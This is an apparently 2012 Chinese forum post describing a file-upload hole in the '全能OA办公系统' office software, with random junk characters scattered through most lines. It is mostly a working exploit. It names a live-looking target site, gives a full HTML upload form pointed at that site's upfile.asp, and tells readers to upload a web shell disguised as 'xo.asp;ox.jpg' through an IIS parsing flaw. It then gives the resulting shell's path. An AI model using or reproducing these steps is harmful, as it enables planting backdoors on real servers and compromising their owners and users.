全能OA办公系统 上传漏洞
( q* `3 y# [. X' M: ]2 g4 W; b& L
系统介绍:
6 }: z3 ^2 N, m2 f2 H- i* w! r
. g9 ^, i3 Z, ~* S# N全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。& s/ e( ^4 a0 j2 A: P5 g
2 Z# R- C, j S% n主要功能:
3 r4 I4 M3 i# L1 k/ a公司通告 ; K; m6 d! n: s) d' p" z, \
工作计划
! E! z, E; W6 [: W通讯助理 + _0 X: {) B% `* Z+ v7 _6 H, Y8 E
客户资源
1 P3 m$ O- Y5 l% d* y6 B0 d我的公文
; E3 A `- J. A" D0 Y. E公文传阅
6 W% B! q. s5 P r/ c公共资源 # K- ` o: a7 Y9 `0 p
资源预约
8 U: ]1 O0 e- c( y. c" U今日考勤 ! T8 S' w; n6 Y% ~: y A, j, [' `, L
个人计划
7 n8 x8 u4 ^+ [8 @. e! X' W个人通讯录
: {9 h f% _2 @8 W& N个人基本档案
7 Z9 |3 e& d2 K3 }, n7 }3 p/ a, [9 h未读邮件
! ?+ ]5 X, \% u) ^3 c: g, S7 z发邮件 6 h/ J1 f! o9 S2 @4 D' P8 P
收件夹
$ j' @: ^' K$ n/ G( o寄件夹 3 l/ V7 f& f$ Y; F H* \+ G
网络硬盘
$ _ D. M3 ?" M: o3 m% K2 r网络会议 0 g/ d- b1 n; e7 D) O% O
网络调查 ' v3 F# j0 x( ~. T ^ k9 L* g5 h3 |$ {
交流论坛% Q' ?: R. D& v: U; d
: y" x( {9 U- B
有兴趣测试的朋友可以下源码看看+ ]$ P) X6 u& \- M) I7 Q
4 k8 R* @0 z5 v" V0 I6 e3 v2 _
源码下载:
7 p6 j% x' R/ b0 E" C8 L7 G7 {
# N7 m! T' r" mhttp://www.mycodes.net/30/4750.htm
9 N4 b# ]3 o% ?) C* w* a4 ~
( O- G, Z8 M h" f漏洞介绍:
/ i1 d( D2 k! w0 @0 G8 a1 S0 u
! r5 T+ G* d2 _) m由upfile.asp上传文件漏洞引起
0 A! `0 b5 z6 W' F4 A! Q. A) A& z) A3 h. t
测试方法:
; h0 }0 e* Z; J) f- B7 p I' u2 e0 x6 b; ]4 g1 d0 E6 j
使用名小子上传http://www.itlynn.com/upfile.asp即可0 k: `- Q' u. p% S
# R. U* [, c: X( R( }( `如果upfile.asp文件被删除不存在。$ n: a0 K Q8 v# d* |& i/ U
1 V3 J* H9 F7 @; d2 g 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。. z) @- @ x$ p8 y! R
6 [4 P# G- @2 t如果存在那么将如下代码保存为upfile.html。1 s( X9 K' J5 r8 i' s9 u9 Z1 F3 o
+ ]" k- P9 l* [+ C然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。% ]1 l& K3 p- d2 G# |8 x$ G
! U A8 `0 n' B# X! B m
4 l6 p9 Z6 w( Y$ |( F% q- P" l2 t" Z
01 <table border='0' align="center" cellpadding="5">
' d1 Y+ o g/ u7 I$ {$ {6 q
! Z7 B! K! E4 r' s) K$ Q% G* I02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
; R, U. `! J4 _9 f7 {4 u. ^8 k4 h' T! ^* O; W$ v
03 <tr>
3 j2 h2 f6 E! ^ H: X5 Q7 }" T! g. X
04 <td>报错:</td> ' u8 m6 C: l" y: {: O
% b7 _2 I. u9 c& }
05 <td><input type='radio' name='errnumber' value='0'> % i0 `( K3 N* O- ?% S
2 v1 \' t6 X) C' S; [" j* c$ v06 自动更名 7 T4 \* W, r W' ?" I- f, b& J
' s, c9 j2 D0 M07 <input type='radio' name='errnumber' value='1' checked>
6 P" \+ u8 f( F% O0 R( }: q+ a4 \& {. e! m4 J' q9 z. w
08 报错方式
7 c+ t" |5 z* J" d* ~# [" V; _) }+ Y0 O/ M4 ~
09 <input type='radio' name='errnumber' value='2'>
% O4 l0 N2 d: R. o, L# h% l$ {( q" O+ g6 R8 C) v
10 直接覆盖</td>
7 B9 l R6 x0 B2 U! J* F- n- X
11 </tr>
" e3 ~' \0 D5 g) `4 P+ M
0 v* V( l/ A" r2 Q1 R$ M, [- Z12 <tr> - X6 m1 I6 _2 [9 h3 f% l
' A- e& h% s$ I c" J* R/ y, \7 N13 <td>主题:</td> * F; t( v" B6 j F
# i! o. r& L3 p+ M1 Z14 <td><input type='text' name='filename' size='30'></td>
/ c1 r7 }8 @3 q; F7 a7 [% ]* r5 Q, m
15 </tr> ! C- l' c( y( P# q5 Z
! w; s' H* `* x2 @' j) s16 <tr>
: {% ]; v6 `* n2 G0 w% p+ \: G9 F K& U6 d* v5 \. A5 [4 v) R
17 <td>文件:</td>
/ D$ c# F1 C, |: a k" t0 M8 U1 t0 \0 l6 N6 o9 G
18 <td><input type="file"name="fruit"size="30"></td>
" ]+ c( O: ?# ~. P/ V& j" z" a8 E w+ v1 g, n: {0 w @' q
19 </tr>
6 ~6 m5 Y( i5 G, j4 t
9 N) L% F6 d1 s20 <tr>
5 |( w9 r3 C' f1 r3 m# N& E. G' _, Z8 c- z K, L
21 <td valign='top'>简介:</td> : H( M: z0 Z" m9 }9 x7 D, T
; Q+ L/ P: Q) M1 y5 ]# g22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
/ C) e" A- V8 w; K4 @/ ?% u8 X* {) W; u% F! n
23 </tr>
+ |2 m! g0 a6 ?2 T. Z' }$ l2 i9 Z+ M1 E/ y/ u6 ]
24
) B7 A8 p% F6 g7 `, ^
% m9 v0 g" a) o6 [2 w4 C25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
) j1 K* Y* u! }% A9 l) T6 n
* V% Z9 f! t" B( E8 ?" x6 T26 </tr> ! E/ Z# b% k& l: y+ Y
) G+ T7 N. ^/ Y1 P# ^
27 </form> ) z$ L% D! o2 X3 o/ Q
' @. @# o* p' O3 F1 B9 y' L然后打开上传一个文件名为xo.asp;ox.jpg的文件。
4 X( D5 E8 K7 c+ Y5 ~: M, ]
! G! d2 m4 G7 g! g 3 p+ V5 x/ w$ n1 X, e
& o' V/ e) `) w k1 H6 u7 f! [上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
: m5 {. P0 X* `
1 e' Q X0 V4 N7 @! t" Z此漏洞需要配合解析漏洞利用。
9 Q- k+ z2 Z+ j' r& y! q1 g, J. m& _5 G* a- E: E" C& L. H
|
发表于 2012-11-21 13:45:12
收藏
支持
反对